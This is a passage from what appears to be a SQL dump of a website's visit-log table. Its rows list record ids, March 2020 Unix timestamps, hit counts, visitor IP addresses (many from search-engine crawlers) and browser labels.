84667618,1,1,0,0,'141.8.142.119','other'),(490072,1584667697,2,2,0,0,'66.249.64.24','chrome'),(490073,1584667699,1,1,0,0,'37.9.113.142','other'),(490074,1584667861,1,1,0,0,'66.249.70.36','chrome'),(490075,1584668170,3,3,0,0,'151.80.39.80','other'),(490076,1584668174,1,1,0,0,'8.29.198.25','other'),(490077,1584668307,1,1,0,0,'37.9.113.6','other'),(490078,1584668310,1,1,0,0,'95.108.181.104','other'),(490079,1584668340,4,4,0,0,'151.80.39.236','other'),(490080,1584668556,1,1,0,0,'141.8.142.177','other'),(490081,1584668701,2,2,0,0,'157.55.39.161','other'),(490082,1584669020,1,1,0,0,'8.29.198.27','other'),(490083,1584669171,4,4,0,0,'66.249.64.23','chrome'),(490084,1584669196,1,1,0,0,'66.249.64.24','chrome'),(490085,1584669265,1,1,0,0,'207.46.13.224','other'),(490086,1584669405,1,1,0,0,'157.55.39.74','other'),(490087,1584669660,1,1,0,0,'141.8.188.18','other'),(490088,1584670393,1,1,0,0,'141.8.142.132','other'),(490089,1584670420,1,1,0,0,'141.8.183.100','other'),(490090,1584670688,1,1,0,0,'37.9.113.6','other'),(490091,1584671118,1,1,0,0,'141.8.188.12','other'),(490092,1584671165,1,1,0,0,'207.46.13.69','other'),(490093,1584671234,1,1,0,0,'66.249.64.24','chrome'),(490094,1584671766,1,1,0,0,'66.249.64.25','chrome'),(490095,1584672621,2,2,0,0,'66.249.64.24','chrome'),(490096,1584672693,3,3,0,0,'66.249.64.25','chrome'),(490097,1584672975,1,1,0,0,'207.46.13.69','other'),(490098,1584673490,1,1,0,0,'141.8.183.73','other'),(490099,1584673753,1,1,0,0,'141.8.142.50','other'),(490100,1584673792,1,1,0,0,'66.249.64.24','chrome'),(490101,1584675031,1,1,0,0,'157.55.39.74','other'),(490102,1584675124,1,1,0,0,'66.249.70.33','chrome'),(490103,1584675287,1,0,1,0,'66.249.64.23',''),(490104,1584675621,1,1,0,0,'141.8.142.128','other'),(490105,1584675785,1,1,0,0,'220.186.92.197','chrome'),(490106,1584675794,1,1,0,0,'40.71.44.234','chrome'),(490107,1584675834,1,1,0,0,'66.249.64.24','chrome'),(490108,1584676365,1,1,0,0,'151.80.39.80','other'),(490109,1584676518,6,6,0,0,'151.80.39.236','other'),(490110,1584676630,2,2,0,0,'66.249.64.25','chrome'),(490111,1584676735,1,1,0,0,'141.8.142.132','other'),(490112,1584676855,1,1,0,0,'66.249.70.33','chrome'),(490113,1584677513,1,1,0,0,'114.97.242.164','chrome'),(490114,1584677546,1,1,0,0,'66.249.64.23','chrome'),(490115,1584677655,2,2,0,0,'151.80.39.236','other'),(490116,1584677669,1,1,0,0,'141.8.132.2','other'),(490117,1584677882,2,2,0,0,'151.80.39.80','other'),(490118,1584678194,1,1,0,0,'66.249.64.24','chrome'),(490119,1584678515,1,1,0,0,'46.211.45.215','chrome'),(490120,1584678682,2,2,0,0,'5.255.253.8','other'),(490121,1584679009,2,2,0,0,'8.29.198.27','other'),(490122,1584679540,1,1,0,0,'157.55.39.161','other'),(490123,1584679918,1,1,0,0,'141.8.188.25','other'),(490124,1584680734,1,1,0,0,'37.9.113.200','other'),(490125,1584680890,1,1,0,0,'157.55.39.74','other'),(490126,1584681445,2,2,0,0,'141.8.142.132','other'),(490127,1584681484,1,1,0,0,'141.8.183.15','other'),(490128,1584681579,2,2,0,0,'157.55.39.161','other'),(490129,1584682910,1,1,0,0,'141.8.188.39','other'),(490130,1584682943,1,1,0,0,'62.205.134.182','other'),(490131,1584683717,1,1,0,0,'117.60.37.107','chrome'),(490132,1584684195,1,1,0,0,'157.55.39.161','other'),(490133,1584684541,1,1,0,0,'66.249.64.24','chrome'),(490134,1584684980,1,1,0,0,'66.249.64.23','chrome'),(490135,1584685448,2,2,0,0,'91.196.178.163','chrome'),(490136,1584686219,1,1,0,0,'157.55.39.74','other'),(490137,1584686413,1,1,0,0,'141.8.188.25','other'),(490138,1584686602,1,1,0,0,'66.249.64.25','chrome'),(490139,1584686659,1,1,0,0,'91.196.178.76','chrome'),(490140,1584686740,1,1,0,0,'46.29.165.78','chrome'),(490141,1584687015,1,1,0,0,'66.249.64.23','chrome'),(490142,1584688083,2,2,0,0,'157.55.39.74','other'),(490143,1584689031,3,3,0,0,'157.55.39.74','other'),(490144,1584689439,1,1,0,0,'157.55.39.161','other'),(490145,1584689473,2,2,0,0,'91.196.178.67','chrome'),(490146,1584689844,1,1,0,0,'8.29.198.25','other'),(490147,1584690094,1,1,0,0,'175.165.229.38','chrome'),(490148,1584690117,1,1,0,0,'222.189.190.32','chrome'),(490149,1584690678,1,1,0,0,'8.29.198.26','other'),(490150,1584691557,2,2,0,0,'157.55.39.74','other'),(490151,1584691964,2,2,0,0,'66.249.64.24','chrome'),(490152,1584692099,2,2,0,0,'66.249.64.23','chrome'),(490153,1584692793,1,1,0,0,'183.166.134.83','chrome'),(490154,1584692801,1,1,0,0,'117.95.106.50','chrome'),(490155,1584692811,1,1,0,0,'91.196.177.46','chrome'),(490156,1584692814,1,1,0,0,'64.225.30.127','chrome'),(490157,1584694188,1,1,0,0,'66.249.64.25','chrome'),(490158,1584695185,1,1,0,0,'91.196.178.67','chrome'),(490159,1584695409,1,1,0,0,'66.249.64.25','chrome'),(490160,1584695419,2,1,1,0,'66.249.64.24',''),(490161,1584695702,1,1,0,0,'114.227.160.162','chrome'),(490162,1584695910,1,1,0,0,'66.249.70.38','chrome'),(490163,1584696014,1,1,0,0,'66.249.70.33','chrome'),(490164,1584696120,1,1,0,0,'3.19.222.136','chrome'),(490165,1584696277,3,3,0,0,'157.55.39.74','other'),(490166,1584696902,2,2,0,0,'66.249.64.24','chrome'),(490167,1584696944,1,1,0,0,'66.249.64.23','chrome'),(490168,1584697333,2,2,0,0,'66.249.64.25','chrome'),(490169,1584697656,1,1,0,0,'66.249.70.38','chrome'),(490170,1584697862,1,1,0,0,'91.196.178.188','chrome'),(490171,1584697981,1,1,0,0,'182.35.21.174','chrome'),(490172,1584697986,1,1,0,0,'1.182.192.146','chrome'),(490173,1584698301,1,1,0,0,'66.249.70.36','chrome'),(490174,1584698343,1,1,0,0,'185.212.250.252','chrome'),(490175,1584698504,1,1,0,0,'173.252.111.10','other'),(490176,1584698570,1,1,0,0,'157.55.39.74','other'),(490177,1584699616,1,1,0,0,'66.249.64.24','chrome'),(490178,1584699641,2,2,0,0,'195.69.223.157','chrome'),(490179,1584699666,1,1,0,0,'157.55.39.74','other'),(490180,1584699859,2,2,0,0,'157.55.39.161','other'),(490181,1584700376,1,1,0,0,'112.113.155.60','chrome'),(490182,1584700590,1,1,0,0,'62.205.134.182','other'),(490183,1584700671,1,1,0,0,'8.29.198.25','other'),(490184,1584701015,1,1,0,0,'66.249.64.23','chrome'),(490185,1584701362,1,1,0,0,'157.55.39.74','other'),(490186,1584701508,1,1,0,0,'8.29.198.27','other'),(490187,1584701977,1,1,0,0,'109.95.51.164','other'),(490188,1584702164,2,2,0,0,'66.249.64.25','chrome'),(490189,1584702315,1,1,0,0,'91.196.178.106','chrome'),(490190,1584702701,2,2,0,0,'66.249.64.23','chrome'),(490191,1584702748,3,3,0,0,'66.249.64.24','chrome'),(490192,1584703379,1,1,0,0,'157.55.39.161','other'),(490193,1584703388,2,2,0,0,'157.55.39.74','other'),(490194,1584703490,1,1,0,0,'173.252.111.23','other'),(490195,1584704331,1,1,0,0,'66.102.9.175','chrome'),(490196,1584704724,1,1,0,0,'175.165.229.178','chrome'),(490197,1584705097,2,2,0,0,'66.249.64.25','chrome'),(490198,1584705313,1,1,0,0,'178.95.150.193','chrome'),(490199,1584705855,1,1,0,0,'109.74.154.72','chrome'),(490200,1584706026,3,3,0,0,'66.249.64.23','chrome'),(490201,1584706632,1,1,0,0,'66.249.64.25','chrome'),(490202,1584707061,1,1,0,0,'66.249.64.23','chrome'),(490203,1584707672,1,1,0,0,'157.55.39.161','other'),(490204,1584709012,1,1,0,0,'66.249.64.25','chrome'),(490205,1584709084,1,1,0,0,'157.55.39.161','other'),(490206,1584709617,1,1,0,0,'178.92.74.149','chrome'),(490207,1584709753,1,1,0,0,'141.8.142.177','other'),(490208,1584709962,1,1,0,0,'66.249.64.24','chrome'),(490209,1584709983,2,2,0,0,'66.249.64.25','chrome'),(490210,1584710004,1,1,0,0,'66.249.64.23','chrome'),(490211,1584710186,1,0,1,0,'157.55.39.161',''),(490212,1584711505,2,2,0,0,'8.29.198.26','other'),(490213,1584711542,1,1,0,0,'5.45.207.65','other'),(490214,1584711821,1,1,0,0,'66.249.64.23','chrome'),(490215,1584712317,1,1,0,0,'195.69.221.54','firefox'),(490216,1584712577,1,1,0,0,'46.211.56.139','chrome'),(490217,1584713134,1,1,0,0,'178.92.74.149','chrome'),(490218,1584713217,3,3,0,0,'178.154.171.134','other'),(490219,1584714650,1,0,1,0,'157.55.39.161',''),(490220,1584715016,1,1,0,0,'46.219.204.224','chrome'),(490221,1584715663,1,1,0,0,'91.196.177.46','chrome'),(490222,1584715742,1,0,1,0,'157.55.39.161',''),(490223,1584715798,2,2,0,0,'66.249.64.23','chrome'),(490224,1584716473,1,1,0,0,'173.252.111.18','other'),(490225,1584716624,1,1,0,0,'87.250.224.90','other'),(490226,1584716631,1,1,0,0,'112.85.45.247','chrome'),(490227,1584717014,1,1,0,0,'91.196.178.184','chrome'),(490228,1584717037,2,2,0,0,'157.55.39.161','other'),(490229,1584717611,1,1,0,0,'5.44.169.215','chrome'),(490230,1584717771,2,2,0,0,'66.249.70.38','chrome'),(490231,1584717825,3,3,0,0,'157.55.39.74','other'),(490232,1584717990,1,1,0,0,'66.249.64.23','chrome'),(490233,1584718362,1,1,0,0,'157.55.39.161','other'),(490234,1584718516,2,2,0,0,'178.154.171.134','other'),(490235,1584719114,1,1,0,0,'66.249.70.33','chrome'),(490236,1584719231,1,1,0,0,'91.196.178.162','chrome'),(490237,1584720072,1,1,0,0,'5.45.207.49','other'),(490238,1584720139,2,2,0,0,'157.55.39.74','other'),(490239,1584720183,1,1,0,0,'80.249.145.139','other'),(490240,1584720314,1,1,0,0,'37.9.113.202','other'),(490241,1584720579,1,1,0,0,'66.249.64.25','chrome'),(490242,1584720887,1,1,0,0,'66.249.64.24','chrome'),(490243,1584721159,1,1,0,0,'151.80.39.80','other'),(490244,1584721528,1,1,0,0,'66.249.64.23','chrome'),(490245,1584721762,1,1,0,0,'157.55.39.161','other'),(490246,1584722334,1,1,0,0,'8.29.198.25','other'),(490247,1584722359,1,1,0,0,'151.80.39.80','other'),(490248,1584722426,2,2,0,0,'66.249.64.25','chrome'),(490249,1584722541,3,3,0,0,'66.249.64.23','chrome'),(490250,1584722723,1,1,0,0,'221.206.82.221','chrome'),(490251,1584722909,3,3,0,0,'157.55.39.74','other'),(490252,1584723166,1,1,0,0,'8.29.198.26','other'),(490253,1584723499,1,1,0,0,'151.80.39.236','other'),(490254,1584723537,1,1,0,0,'157.55.39.161','other'),(490255,1584723641,1,1,0,0,'66.249.64.23','chrome'),(490256,1584723881,1,1,0,0,'91.196.178.11','chrome'),(490257,1584724081,1,1,0,0,'173.252.111.5','other'),(490258,1584724291,1,1,0,0,'91.196.178.85','chrome'),(490259,1584724301,2,2,0,0,'178.154.171.134','other'),(490260,1584724701,1,1,0,0,'151.80.39.80','other'),(490261,1584724808,1,1,0,0,'66.249.64.30','chrome'),(490262,1584725371,1,1,0,0,'178.154.171.127','other'),(490263,1584725644,1,1,0,0,'157.55.39.161','other'),(490264,1584725906,2,2,0,0,'178.154.171.134','other'),(490265,1584725946,1,1,0,0,'151.80.39.236','other'),(490266,1584726650,2,2,0,0,'157.55.39.74','other'),(490267,1584727240,1,1,0,0,'151.80.39.80','other'),(490268,1584727295,1,1,0,0,'66.249.64.24','chrome'),(490269,1584727463,2,2,0,0,'178.154.171.134','other'),(490270,1584727686,1,1,0,0,'209.17.96.226','other'),(490271,1584727945,1,1,0,0,'157.55.39.74','other'),(490272,1584728010,1,1,0,0,'157.55.39.161','other'),(490273,1584728798,2,2,0,0,'66.249.64.23','chrome'),(490274,1584728842,1,1,0,0,'207.46.13.10','other'),(490275,1584729049,1,1,0,0,'66.249.70.38','chrome'),(490276,1584729335,1,1,0,0,'151.80.39.236','other'),(490277,1584729669,1,1,0,0,'157.55.39.161','other'),(490278,1584730981,2,2,0,0,'66.249.64.24','chrome'),(490279,1584731326,1,1,0,0,'151.80.39.80','other'),(490280,1584731413,1,1,0,0,'178.154.171.134','other'),(490281,1584731909,1,1,0,0,'66.249.64.23','chrome'),(490282,1584732459,1,1,0,0,'207.46.13.216','other'),(490283,1584732471,2,0,2,0,'207.46.13.10',''),(490284,1584732882,1,1,0,0,'66.249.64.25','chrome'),(490285,1584732899,1,1,0,0,'66.249.64.24','chrome'),(490286,1584733169,1,1,0,0,'8.29.198.25','other'),(490287,1584733268,1,1,0,0,'213.180.203.11','other'),(490288,1584733731,1,1,0,0,'17.58.101.25','other'),(490289,1584733994,1,1,0,0,'8.29.198.27','other'),(490290,1584734125,1,1,0,0,'213.180.203.186','other'),(490291,1584734240,1,1,0,0,'157.55.39.198','other'),(490292,1584734429,1,1,0,0,'157.55.39.161','other'),(490293,1584735969,1,0,1,0,'207.46.13.10',''),(490294,1584736332,1,1,0,0,'213.180.203.11','other'),(490295,1584736736,1,1,0,0,'66.249.64.25','chrome'),(490296,1584736960,1,1,0,0,'178.154.171.134','other'),(490297,1584737090,1,1,0,0,'66.249.70.36','chrome'),(490298,1584737268,1,1,0,0,'66.249.64.24','chrome'),(490299,1584737782,2,2,0,0,'213.180.203.11','other'),(490300,1584738670,3,3,0,0,'66.249.64.24','chrome'),(490301,1584738990,1,1,0,0,'66.249.64.25','chrome'),(490302,1584739265,1,1,0,0,'178.154.200.87','other'),(490303,1584739273,2,2,0,0,'157.55.39.198','other'),(490304,1584739681,1,1,0,0,'66.249.64.24','chrome'),(490305,1584740053,1,1,0,0,'178.154.200.47','other'),(490306,1584740462,1,1,0,0,'66.249.70.38','chrome'),(490307,1584740556,1,1,0,0,'66.249.64.23','chrome'),(490308,1584741542,1,1,0,0,'213.180.203.29','other'),(490309,1584741632,1,1,0,0,'66.249.70.33','chrome'),(490310,1584742054,1,1,0,0,'66.249.64.24','chrome'),(490311,1584742107,1,1,0,0,'207.46.13.10','other'),(490312,1584742118,1,1,0,0,'178.154.200.47','other'),(490313,1584742223,1,1,0,0,'66.249.70.38','chrome'),(490314,1584742345,1,1,0,0,'213.180.203.85','other'),(490315,1584743197,1,1,0,0,'207.46.13.10','other'),(490316,1584743696,2,2,0,0,'213.180.203.186','other'),(490317,1584743697,1,1,0,0,'116.193.170.50','chrome'),(490318,1584743701,2,2,0,0,'157.55.39.198','other'),(490319,1584744003,1,1,0,0,'8.29.198.25','other'),(490320,1584744584,1,1,0,0,'66.249.64.25','chrome'),(490321,1584744798,1,1,0,0,'66.249.64.24','chrome'),(490322,1584744821,1,1,0,0,'8.29.198.26','other'),(490323,1584745491,1,1,0,0,'199.244.88.131','chrome'),(490324,1584745705,1,1,0,0,'66.249.64.23','chrome'),(490325,1584746789,1,1,0,0,'5.44.169.215','chrome'),(490326,1584748078,1,1,0,0,'207.46.13.10','other'),(490327,1584748703,1,1,0,0,'157.55.39.161','other'),(490328,1584749504,1,1,0,0,'213.180.203.52','other'),(490329,1584750128,1,1,0,0,'213.180.203.186','other'),(490330,1584750330,1,1,0,0,'178.154.200.20','other'),(490331,1584750446,1,1,0,0,'122.192.29.195','chrome'),(490332,1584750776,1,1,0,0,'213.180.203.11','other'),(490333,1584751428,1,1,0,0,'66.249.70.33','chrome'),(490334,1584751436,1,1,0,0,'157.55.39.198','other'),(490335,1584751459,1,1,0,0,'66.249.64.24','chrome'),(490336,1584751470,2,2,0,0,'66.249.64.23','chrome'),(490337,1584751677,1,1,0,0,'185.105.89.72','chrome'),(490338,1584751687,1,1,0,0,'157.55.39.161','other'),(490339,1584752105,1,1,0,0,'62.205.134.182','other'),(490340,1584752229,1,1,0,0,'213.180.203.186','other'),(490341,1584752714,1,1,0,0,'178.154.200.20','other'),(490342,1584752844,1,1,0,0,'66.249.64.25','chrome'),(490343,1584753047,1,1,0,0,'213.180.203.11','other'),(490344,1584753102,1,1,0,0,'122.194.9.253','chrome'),(490345,1584753793,1,1,0,0,'213.180.203.186','other'),(490346,1584754488,1,1,0,0,'213.180.203.11','other'),(490347,1584754560,1,1,0,0,'207.46.13.10','other'),(490348,1584754569,1,1,0,0,'207.46.13.216','other'),(490349,1584754824,1,1,0,0,'40.77.189.67','other'),(490350,1584754836,1,1,0,0,'8.29.198.27','other'),(490351,1584755653,1,1,0,0,'8.29.198.26','other'),(490352,1584755838,2,2,0,0,'213.180.203.186','other'),(490353,1584756602,1,1,0,0,'209.17.96.74','other'),(490354,1584756680,1,1,0,0,'66.249.64.23','chrome'),(490355,1584756705,1,1,0,0,'213.180.203.11','other'),(490356,1584756814,2,2,0,0,'157.55.39.198','other'),(490357,1584757133,1,1,0,0,'157.55.39.222','other'),(490358,1584757531,2,2,0,0,'213.180.203.186','other'),(490359,1584757959,1,1,0,0,'91.209.11.236','other'),(490360,1584758486,1,1,0,0,'95.142.121.17','other'),(490361,1584758569,1,1,0,0,'66.249.64.23','chrome'),(490362,1584758715,2,2,0,0,'213.180.203.11','other'),(490363,1584759660,1,1,0,0,'54.36.149.3','other'),(490364,1584760133,2,2,0,0,'207.46.13.10','other'),(490365,1584760147,1,1,0,0,'178.154.171.134','other'),(490366,1584760148,1,1,0,0,'178.154.171.127','other'),(490367,1584760271,1,1,0,0,'213.180.203.13','other'),(490368,1584760879,2,2,0,0,'157.55.39.161','other'),(490369,1584761158,1,1,0,0,'178.154.200.68','other'),(490370,1584761210,1,1,0,0,'66.249.64.25','chrome'),(490371,1584761595,1,1,0,0,'157.55.39.198','other'),(490372,1584761633,1,1,0,0,'207.46.13.10','other'),(490373,1584762070,1,1,0,0,'116.248.186.138','chrome'),(490374,1584762426,1,1,0,0,'213.180.203.29','other'),(490375,1584762502,1,1,0,0,'60.166.75.97','chrome'),(490376,1584762515,1,1,0,0,'157.55.39.161','other'),(490377,1584762722,1,1,0,0,'178.154.200.47','other'),(490378,1584763472,1,1,0,0,'66.249.64.25','chrome'),(490379,1584763484,1,1,0,0,'157.55.39.198','other'),(490380,1584763497,2,2,0,0,'91.209.11.236','other'),(490381,1584764003,1,1,0,0,'54.36.149.48','other'),(490382,1584764118,2,2,0,0,'157.55.39.222','other'),(490383,1584764204,1,1,0,0,'157.55.39.161','other'),(490384,1584764409,1,1,0,0,'60.169.134.245','chrome'),(490385,1584765088,1,1,0,0,'66.249.64.23','chrome'),(490386,1584765337,2,2,0,0,'54.36.149.58','other'),(490387,1584765470,1,1,0,0,'213.180.203.13','other'),(490388,1584765621,1,1,0,0,'178.154.171.134','other'),(490389,1584765636,3,3,0,0,'167.86.70.217','other'),(490390,1584765669,2,2,0,0,'8.29.198.26','other'),(490391,1584765673,2,1,1,0,'66.249.64.24',''),(490392,1584765968,1,1,0,0,'54.36.149.19','other'),(490393,1584766476,1,1,0,0,'54.36.149.59','other'),(490394,1584766575,3,3,0,0,'213.180.203.11','other'),(490395,1584766853,3,3,0,0,'71.179.200.87','other'),(490396,1584767063,1,1,0,0,'66.249.64.23','chrome'),(490397,1584767155,2,2,0,0,'66.249.64.25','chrome'),(490398,1584767678,1,1,0,0,'31.13.103.9','other'),(490399,1584767747,1,1,0,0,'40.77.189.197','other'),(490400,1584767749,1,1,0,0,'40.77.190.47','other'),(490401,1584767750,1,1,0,0,'40.77.188.204','other'),(490402,1584767752,1,1,0,0,'40.77.190.89','other'),(490405,1584767753,1,1,0,0,'40.77.191.61','other'),(490408,1584767754,1,1,0,0,'40.77.188.158','other'),(490410,1584768554,1,1,0,0,'158.69.127.133','other'),(490411,1584768592,1,1,0,0,'158.69.127.133','chrome'),(490412,1584769076,1,1,0,0,'66.249.64.25','chrome'),(490413,1584769112,1,1,0,0,'54.36.149.31','other'),(490414,1584769148,1,1,0,0,'62.205.134.182','other'),(490415,1584769238,1,1,0,0,'66.249.64.23','chrome'),(490416,1584769285,1,1,0,0,'213.180.203.11','other'),(490417,1584769494,1,1,0,0,'66.249.70.33','chrome'),(490418,1584769517,2,2,0,0,'157.55.39.161','other'),(490419,1584770439,1,1,0,0,'213.180.203.186','other'),(490420,1584771518,1,1,0,0,'66.249.64.23','chrome'),(490421,1584771714,1,1,0,0,'213.180.203.186','other'),(490422,1584772363,4,4,0,0,'66.249.64.24','chrome'),(490423,1584772372,1,1,0,0,'54.36.149.39','other'),(490424,1584772384,1,1,0,0,'213.180.203.149','other'),(490425,1584772438,1,1,0,0,'157.55.39.222','other'),(490426,1584772572,1,1,0,0,'66.249.64.23','chrome'),(490427,1584773839,1,1,0,0,'157.55.39.161','other'),(490428,1584774178,1,1,0,0,'213.180.203.10','other'),(490429,1584774261,1,1,0,0,'66.249.64.24','chrome'),(490430,1584775205,1,1,0,0,'66.249.64.23','chrome'),(490431,1584775247,1,1,0,0,'213.180.203.187','other'),(490432,1584775250,1,1,0,0,'178.154.200.68','other'),(490433,1584775938,4,4,0,0,'157.55.39.222','other'),(490434,1584776070,1,1,0,0,'66.249.64.25','chrome'),(490435,1584776477,2,2,0,0,'66.249.70.36','chrome'),(490436,1584776501,2,2,0,0,'8.29.198.26','other'),(490437,1584776723,2,2,0,0,'178.154.171.134','other'),(490438,1584776985,1,1,0,0,'178.154.200.77','other'),(490439,1584777438,1,1,0,0,'185.120.90.70','chrome'),(490440,1584777561,1,1,0,0,'157.55.39.161','other'),(490441,1584778218,1,1,0,0,'157.55.39.222','other'),(490442,1584778973,1,1,0,0,'157.55.39.161','other'),(490443,1584779371,1,1,0,0,'91.196.178.107','chrome'),(490444,1584779493,1,1,0,0,'183.166.98.254','chrome'),(490445,1584779724,1,1,0,0,'66.249.70.33','chrome'),(490446,1584780727,1,1,0,0,'141.8.188.25','other'),(490447,1584780766,1,1,0,0,'66.249.64.24','chrome'),(490448,1584780788,1,1,0,0,'54.36.149.81','other'),(490449,1584781264,2,2,0,0,'213.180.203.186','other'),(490450,1584781460,1,0,1,0,'66.249.64.23',''),(490451,1584781844,1,1,0,0,'66.249.64.25','chrome'),(490452,1584782106,1,1,0,0,'114.106.134.166','chrome'),(490453,1584783922,1,1,0,0,'42.242.10.160','chrome'),(490454,1584783941,1,1,0,0,'111.178.207.12','chrome'),(490455,1584783988,1,0,1,0,'66.249.64.24',''),(490456,1584784825,1,1,0,0,'157.55.39.222','other'),(490457,1584785136,1,1,0,0,'91.196.178.183','chrome'),(490458,1584785237,1,1,0,0,'54.36.149.103','other'),(490459,1584786052,1,1,0,0,'157.55.39.222','other'),(490460,1584786500,1,1,0,0,'54.36.149.16','other'),(490461,1584786987,1,1,0,0,'66.249.64.23','chrome'),(490462,1584787330,1,1,0,0,'8.29.198.25','other'),(490463,1584787550,1,1,0,0,'66.249.64.25','chrome'),(490464,1584787716,2,1,1,0,'157.55.39.161',''),(490465,1584788115,1,1,0,0,'157.55.39.161','other'),(490466,1584788127,1,1,0,0,'8.29.198.26','other'),(490467,1584788252,1,1,0,0,'49.86.181.3','chrome'),(490468,1584788736,1,1,0,0,'54.36.149.64','other'),(490469,1584788945,1,1,0,0,'66.249.70.36','chrome'),(490470,1584788976,1,1,0,0,'66.249.64.25','chrome'),(490471,1584789243,1,0,1,0,'66.249.64.23',''),(490472,1584789436,1,1,0,0,'54.36.149.32','other'),(490473,1584789587,2,2,0,0,'157.55.39.222','other'),(490474,1584790035,1,1,0,0,'213.180.203.32','other'),(490475,1584790637,1,1,0,0,'109.74.154.72','chrome'),(490476,1584790705,2,1,1,0,'66.249.64.24',''),(490477,1584790987,1,1,0,0,'178.154.200.91','other'),(490478,1584791122,1,1,0,0,'157.55.39.161','other'),(490479,1584791253,1,1,0,0,'213.180.203.63','other'),(490480,1584791856,1,1,0,0,'173.252.111.11','other'),(490481,1584791889,4,4,0,0,'157.55.39.222','other'),(490482,1584793522,1,1,0,0,'17.58.101.25','other'),(490483,1584794169,1,1,0,0,'116.248.186.237','chrome'),(490484,1584794977,1,1,0,0,'66.249.64.25','chrome'),(490485,1584796060,1,1,0,0,'213.180.203.186','other'),(490486,1584797379,1,1,0,0,'66.249.64.25','chrome'),(490487,1584798162,1,1,0,0,'8.29.198.27','other'),(490488,1584798214,1,1,0,0,'157.55.39.222','other'),(490489,1584798955,1,1,0,0,'8.29.198.26','other'),(490490,1584799239,1,1,0,0,'66.249.64.24','chrome'),(490491,1584799369,2,2,0,0,'66.249.64.23','chrome'),(490492,1584799726,2,2,0,0,'157.55.39.222','other'),(490493,1584800047,1,1,0,0,'182.244.168.191','chrome'),(490494,1584801090,3,2,1,0,'66.249.64.23',''),(490495,1584802348,1,1,0,0,'66.249.64.25','chrome'),(490496,1584802422,1,1,0,0,'91.196.178.183','chrome'),(490497,1584802895,1,1,0,0,'157.55.39.222','other'),(490498,1584804221,1,1,0,0,'157.55.39.222','other'),(490499,1584804787,1,1,0,0,'54.36.149.34','other'),(490500,1584805583,1,1,0,0,'54.36.149.96','other'),(490501,1584806283,1,1,0,0,'54.36.149.28','other'),(490502,1584806577,1,1,0,0,'157.55.39.222','other'),(490503,1584806794,2,2,0,0,'66.249.64.24','chrome'),(490504,1584806937,1,1,0,0,'31.13.127.4','other'),(490505,1584806938,1,1,0,0,'31.13.127.21','other'),(490506,1584807036,1,1,0,0,'31.13.127.19','other'),(490507,1584808194,1,1,0,0,'66.249.64.24','chrome'),(490508,1584808252,1,1,0,0,'66.249.64.25','chrome'),(490509,1584808274,1,0,1,0,'66.249.64.23',''),(490510,1584808291,1,1,0,0,'27.198.55.1','chrome'),(490511,1584808633,1,1,0,0,'95.72.132.19','chrome'),(490512,1584808995,1,1,0,0,'8.29.198.26','other'),(490513,1584809035,1,1,0,0,'54.36.149.22','other'),(490514,1584809785,1,1,0,0,'8.29.198.27','other'),(490515,1584810341,1,1,0,0,'157.55.39.222','other'),(490516,1584811278,1,1,0,0,'124.152.210.138','chrome'),(490517,1584811722,1,1,0,0,'141.8.188.25','other'),(490518,1584811811,1,1,0,0,'157.55.39.222','other'),(490519,1584811917,1,1,0,0,'66.249.64.23','chrome'),(490520,1584812508,1,1,0,0,'213.159.213.137','other'),(490521,1584812790,1,1,0,0,'54.36.149.100','other'),(490522,1584812998,1,1,0,0,'91.196.178.170','chrome'),(490523,1584813084,1,1,0,0,'213.180.203.107','other'),(490524,1584813137,2,2,0,0,'138.201.12.50','chrome'),(490525,1584813594,1,1,0,0,'66.249.64.24','chrome'),(490526,1584815318,1,1,0,0,'213.180.203.10','other'),(490527,1584815594,1,1,0,0,'178.154.200.6','other'),(490528,1584815650,1,1,0,0,'207.46.13.213','other'),(490529,1584817246,1,1,0,0,'66.249.64.24','chrome'),(490530,1584817614,1,1,0,0,'54.36.149.87','other'),(490531,1584817730,1,1,0,0,'138.246.253.5','chrome'),(490532,1584818200,1,1,0,0,'66.249.64.25','chrome'),(490533,1584818813,1,1,0,0,'207.46.13.50','other'),(490534,1584818983,1,1,0,0,'213.180.203.22','other'),(490535,1584819105,1,0,1,0,'66.249.64.24',''),(490536,1584819744,2,2,0,0,'207.46.13.213','other'),(490537,1584819827,1,1,0,0,'8.29.198.26','other'),(490538,1584819998,1,1,0,0,'173.252.111.17','other'),(490539,1584820233,1,1,0,0,'66.249.64.25','chrome'),(490540,1584820524,1,0,1,0,'207.46.13.50',''),(490541,1584820608,1,1,0,0,'8.29.198.25','other'),(490542,1584820731,1,1,0,0,'17.58.101.25','other'),(490543,1584820972,1,1,0,0,'207.46.13.213','other'),(490544,1584821058,2,2,0,0,'157.55.39.222','other'),(490545,1584821534,1,1,0,0,'66.249.64.23','chrome'),(490546,1584821671,1,1,0,0,'54.36.149.44','other'),(490547,1584822245,1,1,0,0,'157.55.39.222','other'),(490548,1584822522,1,1,0,0,'66.249.64.24','chrome'),(490549,1584822850,1,1,0,0,'66.249.64.23','chrome'),(490550,1584823290,1,1,0,0,'213.180.203.82','other'),(490551,1584823950,1,1,0,0,'37.53.111.212','chrome'),(490552,1584824578,1,1,0,0,'37.9.113.177','other'),(490553,1584825066,1,1,0,0,'66.249.64.24','chrome'),(490554,1584825081,1,0,1,0,'207.46.13.50',''),(490555,1584826875,1,1,0,0,'66.249.70.38','chrome'),(490556,1584827356,1,0,1,0,'66.249.64.23',''),(490557,1584827438,1,1,0,0,'178.154.200.42','other'),(490558,1584828121,3,3,0,0,'66.249.64.25','chrome'),(490559,1584828520,2,2,0,0,'66.249.64.23','chrome'),(490560,1584828791,1,1,0,0,'213.180.203.52','other'),(490561,1584829085,1,1,0,0,'66.249.64.25','chrome'),(490562,1584829148,1,1,0,0,'207.46.13.213','other'),(490563,1584830081,1,1,0,0,'66.249.64.25','chrome'),(490564,1584830244,1,1,0,0,'213.180.203.64','other'),(490565,1584830410,2,2,0,0,'207.46.13.213','other'),(490566,1584830658,2,2,0,0,'8.29.198.25','other'),(490567,1584830996,1,1,0,0,'66.249.70.33','chrome'),(490568,1584831047,1,0,1,0,'207.46.13.50',''),(490569,1584831058,1,1,0,0,'66.249.64.25','chrome'),(490570,1584831331,2,2,0,0,'66.249.64.24','chrome'),(490571,1584831593,1,1,0,0,'54.36.149.21','other'),(490572,1584831616,1,1,0,0,'66.249.70.38','chrome'),(490573,1584831925,1,1,0,0,'157.55.39.222','other'),(490574,1584832050,1,1,0,0,'66.249.64.23','chrome'),(490575,1584832790,1,0,1,0,'207.46.13.50',''),(490576,1584833084,2,2,0,0,'207.46.13.213','other'),(490577,1584833450,1,0,1,0,'157.55.39.222',''),(490578,1584833588,1,1,0,0,'66.249.64.24','chrome'),(490579,1584833910,1,1,0,0,'157.55.39.222','other'),(490580,158